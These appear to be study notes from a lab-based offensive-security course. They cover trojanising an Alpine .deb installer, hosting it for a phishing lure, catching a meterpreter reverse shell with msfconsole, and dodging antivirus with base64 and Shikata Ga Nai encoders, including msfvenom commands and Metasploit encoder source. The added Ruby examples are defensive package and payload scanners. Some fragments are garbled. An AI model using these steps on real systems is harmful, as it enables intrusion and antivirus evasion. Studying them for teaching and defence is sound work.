Review:

Metasploit Framework reflection process

msfvenom payload-generation command


Hiding an Implant in a Legitimate File

We’ll execute a similar attack here by sending a phishing email
encouraging a victim to download an updated version of the company’s email client,
Alpine, from a fake site. You’ll execute this attack on the Ubuntu desktop machine in
your virtual environment. Let’s begin by creating the Trojan.

We’ll create our trojan by modifying the Alpine installer, the .deb file, so that it
installs the implant as well as Alpine. Download the legitimate Alpine installer by
running the following command:

kali@kali:~/Desktop/Malware/trojans/$ apt-get download alpine

Extract the contents of the file to the mailTrojan folder by running the following command:

kali@kali:~/Desktop/Malware/trojans/$ engrampa <Alpine DEB file> -e mailTrojan

Editing Your .deb File

You’ll need to edit the Alpine installer’s .deb installation file so that it includes your
malicious implant, so let’s walk through the installer’s structure. All installation files must
contain a DEBIAN folder, which holds the files that describe the program and how to
install it. The installation file can also contain other folders, such as var for files or usr for
binaries. These folders are copied to a location relative to the /home directory during
installation. For example, the installer would copy the usr folder to /home/usr. The
installer then reads the contents of the DEBIAN folder.
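Before repackaging anything, it helps to be able to see what a .deb actually declares. The Ruby script below is an added example, not code from the book or from the Alpine package: it builds a small constructed .deb in memory (an ar archive holding debian-binary, control.tar.gz and data.tar.gz, which is the layout the paragraph describes), then parses it back and reports the control fields, the maintainer scripts that dpkg runs at install and remove time, and the paths carried in data.tar. It handles only gzip-compressed or plain tar members; real packages often use xz, which this example reports as unsupported. Every package name, version, address and file body in it is constructed.

```ruby
require 'stringio'
require 'zlib'
require 'rubygems/package' # Gem::Package::TarWriter / TarReader ship with Ruby

AR_MAGIC = "!<arch>\n".b
MAINTAINER_SCRIPTS = %w[preinst postinst prerm postrm].freeze

# --- builder: a tiny constructed .deb so the audit below can run offline ---

# One ar member: 60-byte header (GNU short name with trailing '/') plus body,
# padded with "\n" to an even length.
def ar_member(name, body)
  header = format('%-16s%-12s%-6s%-6s%-8s%-10s%s',
                  "#{name}/", '0', '0', '0', '100644', body.bytesize.to_s, "`\n")
  header.b + body.b + (body.bytesize.odd? ? "\n".b : ''.b)
end

# Gzip-compressed tar built from { "./path" => content }.
def tar_gz(files)
  tar = StringIO.new(''.b)
  Gem::Package::TarWriter.new(tar) do |w|
    files.each { |name, content| w.add_file(name, 0o644) { |io| io.write(content) } }
  end
  Zlib.gzip(tar.string)
end

# Constructed sample package: metadata, one maintainer script, one payload file.
def build_sample_deb
  control = "Package: alpine\nVersion: 0.0-constructed\nArchitecture: amd64\n" \
            "Maintainer: constructed <none@example.invalid>\n" \
            "Description: constructed sample\n second line of the description\n"
  postinst = "#!/bin/sh\nset -e\n# constructed sample: dpkg runs this at install time\nexit 0\n"
  ctrl = tar_gz('./control' => control, './postinst' => postinst)
  data = tar_gz('./usr/bin/alpine' => "#!/bin/sh\necho constructed stub\n")
  AR_MAGIC + ar_member('debian-binary', "2.0\n") +
    ar_member('control.tar.gz', ctrl) + ar_member('data.tar.gz', data)
end

# --- audit ---

# Parse an ar archive into an ordered { member_name => bytes } hash.
def parse_ar(bytes)
  raise 'not an ar archive' unless bytes.byteslice(0, 8) == AR_MAGIC
  members = {}
  pos = 8
  while pos + 60 <= bytes.bytesize
    hdr = bytes.byteslice(pos, 60)
    raise 'corrupt member header' unless hdr.byteslice(58, 2) == "`\n".b
    name = hdr.byteslice(0, 16).strip.chomp('/')
    size = hdr.byteslice(48, 10).strip.to_i
    members[name] = bytes.byteslice(pos + 60, size)
    pos += 60 + size + (size.odd? ? 1 : 0)
  end
  members
end

# Yield [name without "./", bytes] for every regular file in a tar member.
def each_tar_file(member_name, bytes)
  raise "unsupported compression: #{member_name}" if member_name =~ /\.(xz|zst|bz2)\z/
  tar = member_name.end_with?('.gz') ? Zlib.gunzip(bytes) : bytes
  Gem::Package::TarReader.new(StringIO.new(tar)) do |reader|
    reader.each do |entry|
      next unless entry.file?
      yield entry.full_name.sub(%r{\A\./}, ''), entry.read.to_s
    end
  end
end

# What an installer acts on: control fields, maintainer scripts (run by dpkg,
# so they deserve a read before installing), and the paths data.tar carries.
def audit_deb(deb_bytes)
  members = parse_ar(deb_bytes)
  raise 'missing debian-binary member' unless members['debian-binary']
  ctrl = members.keys.find { |k| k.start_with?('control.tar') } or raise 'missing control.tar'
  data = members.keys.find { |k| k.start_with?('data.tar') } or raise 'missing data.tar'
  fields, scripts, paths = {}, {}, []
  each_tar_file(ctrl, members[ctrl]) do |name, body|
    if name == 'control'
      body.each_line do |line|
        next if line.start_with?(' ', "\t") # continuation of the previous field
        key, value = line.split(':', 2)
        fields[key] = value.strip if value
      end
    elsif MAINTAINER_SCRIPTS.include?(name)
      scripts[name] = body
    end
  end
  each_tar_file(data, members[data]) { |name, _| paths << name }
  { members: members.keys, fields: fields, scripts: scripts, data_paths: paths }
end
```

Running audit_deb on a real package is the same call with File.binread of the .deb; the members list should start with debian-binary, and any maintainer script returned is worth reading in full, since dpkg executes it with root privileges during installation.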


 Adding the Implant

 

Repackage your files into your final .deb installation file.


Hosting the Trojan

kali@kali:~/Desktop/Malware/trojans$ sudo python3 -m http.server 80

Next, you’ll need to start the attacker server that will listen for connections from your
implant. 

kali@kali:~$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST <Kali IP address>; set LPORT 8443; run; exit -y"

Downloading the Infected File

Visit http://<Kali IP address>/mailTrojan.deb (download and installation steps omitted).

how to design your own backdoor. But if you want to install one now, consider using the dbd backdoor designed by Kyle Barnthouse and available at https://github.com/gitdurandal/dbd/.



Evading Antivirus by Using Encoders

You can see which antivirus software will detect your implant by uploading it to VirusTotal at
https://www.virustotal.com/gui/.

Antivirus systems use signature detection to attempt to find malware. A malware’s
signature is a unique sequence of bytes that represents it. You can see our malicious
implant’s byte sequence by running the xxd command:

kali@kali:~/Desktop/Malware$ xxd malicious

Encoders change a program’s signature by modifying its bytes without changing its functionality. 


Start msf:

sudo msfdb init && msfconsole
msf6 > show encoders 

The Base64 Encoder
 

The powershell_base64 encoder uses the base64 encoding scheme, which converts
binary sequences to text, just like the ASCII encoding scheme mentioned in Chapter 5.
However, unlike ASCII, which converts 8-bit sequences, the base64 encoder converts
6-bit sequences to one of 64 possible printable characters. 

As an illustration, consider converting the Linux ls command from ASCII to base64.

The last 6-bit section has only four bits, so the remaining two bits are assumed to be 0,
and the padding character (=) is added to the end. Here is the base64-encoded result:
bHM=.

To run it, we decode it and pass the result to the shell:

base64 -d <<< bHM= | sh 
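The 6-bit grouping described above, carried out in Ruby as an added example (not code from the book): base64_by_hand returns the encoded string together with a trace of each 6-bit group, the index it maps to and the output character, and base64_decode_by_hand reverses the process. The result for ls is cross-checked against Ruby's built-in strict base64 (pack 'm0').

```ruby
# The 64 output symbols, in index order: A-Z, a-z, 0-9, '+', '/'.
B64_ALPHABET = (('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a + ['+', '/']).freeze

# Encode exactly as the text describes: write the input as a bit string, cut it
# into 6-bit groups, zero-fill the last group, map each group to an alphabet
# character, then append one '=' per byte missing from the final 3-byte block.
# Returns [encoded, trace], where trace records every 6-bit group.
def base64_by_hand(input)
  bits = input.unpack1('B*')            # "ls" -> "01101100" "01110011"
  trace = []
  encoded = +''
  bits.scan(/.{1,6}/) do |group|
    padded = group.ljust(6, '0')        # the 4-bit tail "0011" becomes "001100"
    index = padded.to_i(2)
    trace << { bits: padded, index: index, char: B64_ALPHABET[index] }
    encoded << B64_ALPHABET[index]
  end
  encoded << ('=' * ((3 - input.bytesize % 3) % 3))
  [encoded, trace]
end

# Reverse it: drop padding, expand each symbol to 6 bits, keep whole bytes only.
def base64_decode_by_hand(text)
  bits = text.delete('=').each_char.map do |c|
    index = B64_ALPHABET.index(c) or raise ArgumentError, "not a base64 symbol: #{c.inspect}"
    index.to_s(2).rjust(6, '0')
  end.join
  bits[0, bits.length - bits.length % 8].scan(/.{8}/).map { |b| b.to_i(2) }.pack('C*')
end

# Cross-check against Ruby's built-in strict base64 in both directions.
def base64_roundtrip_ok?(input)
  encoded, = base64_by_hand(input)
  encoded == [input].pack('m0') && base64_decode_by_hand(encoded) == input.b
end
```

For ls the trace is 011011 (27, b), 000111 (7, H) and 001100 (12, M), and two input bytes leave one byte missing from the final block, hence the single =.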

base64 --help          
用法:base64 [选项]... [文件]
使用 Base64 编码/解码文件或标准输入输出。

如果没有指定文件,或者文件为"-",则从标准输入读取。

必选参数对长短选项同时适用。
  -d, --decode          解码数据
  -i, --ignore-garbag   解码时忽略非字母字符
  -w, --wrap=字符数     在指定的字符数后自动换行(默认为76),0 为禁用自动换行
 

Example:

A Bash script containing the ls command will have a different signature from a file
containing the base64 -d <<< bHM= | sh command, even though the two are functionally
equivalent. Both files are stored using ASCII encoding, but their byte sequences differ.
Because the signatures are different, an antivirus program may fail to detect the malicious
file containing the base64 values, as described in Figure 10-8.
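From the detection side, the point of this paragraph is that a byte signature computed over the wrapper misses the encoded payload, while a scanner that decodes the base64 layer first still sees it. The Ruby script below is an added example, not the book's code: the signature set and the three sample scripts are constructed stand-ins, the script hashes the plain and wrapped samples to show the signatures differ, then scans by decoding well-formed base64 tokens up to a few layers deep and flags both the decode-to-shell construction and any content rule that matches at any layer.

```ruby
require 'digest'

# Constructed stand-in for a real signature set (name => pattern over plaintext).
CONTENT_SIGNATURES = { 'sample-ls-command' => /\bls\b/ }.freeze

# Structural indicator: base64 decoder output piped into a shell, e.g.
#   base64 -d <<< bHM= | sh        echo bHM= | base64 -d | bash
DECODE_TO_SHELL = /base64\s+(?:-d|--decode)\b.*\|\s*(?:sh|bash|dash|zsh)\b/

# Well-formed base64 tokens: whole 4-char groups, optional 1-2 '=' padding.
B64_TOKEN = %r{\b(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)(?![A-Za-z0-9+/=])}

# The "signature" an engine might key on: a hash over the file's bytes.
def signature(bytes)
  Digest::SHA256.hexdigest(bytes)
end

# Decode a token only if it yields readable text; otherwise nil.
def printable_decode(token)
  text = token.unpack1('m0').force_encoding('UTF-8') # strict base64 decode
  text.valid_encoding? && text.match?(/\A[[:print:]\s]*\z/) ? text : nil
rescue ArgumentError
  nil
end

# Scan script text, then recurse into every base64 token that decodes to text.
# Returns [{ layer:, rule:, text: }, ...] in the order found.
def scan_script(text, layer = 0, max_depth = 3)
  findings = []
  findings << { layer: layer, rule: 'decode-to-shell', text: text.strip } if text.match?(DECODE_TO_SHELL)
  CONTENT_SIGNATURES.each do |name, pattern|
    findings << { layer: layer, rule: name, text: text.strip } if text.match?(pattern)
  end
  return findings if layer >= max_depth
  text.scan(B64_TOKEN).each do |token|
    inner = printable_decode(token)
    findings.concat(scan_script(inner, layer + 1, max_depth)) if inner
  end
  findings
end

# Constructed samples: the same ls command, plain and wrapped one and two layers deep.
PLAIN_SCRIPT   = "#!/bin/sh\nls\n"
ENCODED_SCRIPT = "#!/bin/sh\nbase64 -d <<< bHM= | sh\n"
NESTED_SCRIPT  = "echo #{['base64 -d <<< bHM= | sh'].pack('m0')} | base64 -d | sh\n"

# Summarise: do the byte signatures differ, and what does layered scanning find?
def compare_samples
  {
    signatures_differ: signature(PLAIN_SCRIPT) != signature(ENCODED_SCRIPT),
    plain:   scan_script(PLAIN_SCRIPT).map   { |f| [f[:layer], f[:rule]] },
    encoded: scan_script(ENCODED_SCRIPT).map { |f| [f[:layer], f[:rule]] },
    nested:  scan_script(NESTED_SCRIPT).map  { |f| [f[:layer], f[:rule]] }
  }
end
```

The plain script is caught by the content rule at layer 0; the wrapped script has a different hash and no layer-0 content match, but the decode-to-shell construction fires immediately and the ls rule fires once the bHM= token is decoded. Tokens such as echo that are base64-shaped but decode to unreadable bytes are discarded rather than recursed into.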

 

Vocabulary: polymorphic

This implant.sh is not allowed to connect to Telnet on Kali.

Writing a Metasploit Module

Reference: view the cmd/powershell_base64 encoder in metasploit-framework/powershell_base64.rb at master (rapid7/metasploit-framework on GitHub).

This encoder is used to encode PowerShell scripts for Windows machines.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Encoder
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Powershell Base64 Command Encoder',
      'Description'      => %q{
        This encodes the command as a base64 encoded command for powershell.
      },
      'Author'           => 'Ben Campbell',
      'Arch'             => ARCH_CMD,
      'Platform'         => 'win')
  end


  #
  # Encodes the payload
  #
  def encode_block(state, buf)

    # Skip encoding for empty badchars
    if state.badchars.length == 0
      return buf
    end

    if (state.badchars.include? '-') || (state.badchars.include? ' ')
      return buf
    end

    cmd = encode_buf(buf)

    if state.badchars.include? '='
        while cmd.include? '='
          buf << " "
          cmd = encode_buf(buf)
        end
    end

    cmd
  end

  def encode_buf(buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
    cmd = "powershell -w hidden -nop -e #{base64}"
  end
end
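To see what the encode_block above actually produces, and what an analyst has to undo when such a command line turns up in process logs, here is an added Ruby example that is not the module's code and does not use Rex: ps_encoded_line mirrors encode_buf with Ruby's built-in base64 (Rex::Text.to_unicode defaults to UTF-16LE, which is what PowerShell's -e expects), encode_powershell_command reproduces the badchar decisions including the '=' loop, and decode_powershell_e recovers the original text from a powershell -e command line. The hostname command used in the check is a constructed sample.

```ruby
# Mirror of the module's encode_buf: -e takes base64 of the UTF-16LE command text.
def ps_encoded_line(buf)
  utf16 = "cmd.exe /c start #{buf}".encode('UTF-16LE')
  "powershell -w hidden -nop -e #{[utf16].pack('m0')}"
end

# Same decisions as encode_block above, on a copy of buf (the module appends
# spaces to buf in place). A space is appended until the UTF-16LE byte length
# is a multiple of 3, which is exactly when base64 needs no '=' padding.
def encode_powershell_command(buf, badchars = '')
  return buf if badchars.empty? || badchars.include?('-') || badchars.include?(' ')
  buf = buf.dup
  cmd = ps_encoded_line(buf)
  if badchars.include?('=')
    while cmd.include?('=')
      buf << ' '
      cmd = ps_encoded_line(buf)
    end
  end
  cmd
end

# Analyst side: pull the blob after -e / -ec / -enc / -EncodedCommand and turn it
# back into readable text; nil if there is no such argument or it does not decode.
def decode_powershell_e(cmdline)
  m = cmdline.match(%r{\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)}i)
  return nil unless m
  m[1].unpack1('m0').force_encoding('UTF-16LE').encode('UTF-8')
rescue ArgumentError, EncodingError
  nil
end
```

With '=' as a bad character, "cmd.exe /c start hostname" (25 characters, 50 UTF-16LE bytes) gains two trailing spaces before the padding disappears; the decoder returns that padded text, which is why decoded -e arguments often end in stray whitespace.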

Create a new file called bash_base64.rb inside the Encoders folder.

To test your new encoder, add it to the Metasploit Framework by copying it into the
encoders folder, which you can find by opening your file explorer and navigating to
/usr/share/metasploit-framework/modules/encoders. Create a new folder called bash
and save your bash_base64.rb encoder file here.

Open a new terminal and run the show encoders command in msfconsole to ensure
that your module was added correctly.

Run the following command to create your encoded implant and save it as
implantEncoded:

kali@kali:~/Desktop/Malware/$ implant.sh | msfvenom --payload --arch x86 --platform --encoder bash/bash_base64 -o implantEncoded

Test your encoded implant by making it executable and running it:

kali@kali:~/Desktop/Malware/$ chmod +x implantEncoded
kali@kali:~/Desktop/Malware/$ ./implantEncoded

Shikata Ga Nai Encoder

The following command generates an SGN-encoded payload; remember to replace <Kali IP address> with the IP address of your Kali Linux machine:

sudo msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=<Kali IP address> LPORT=443 --encoder x86/shikata_ga_nai -i 4 -f elf -o malicious
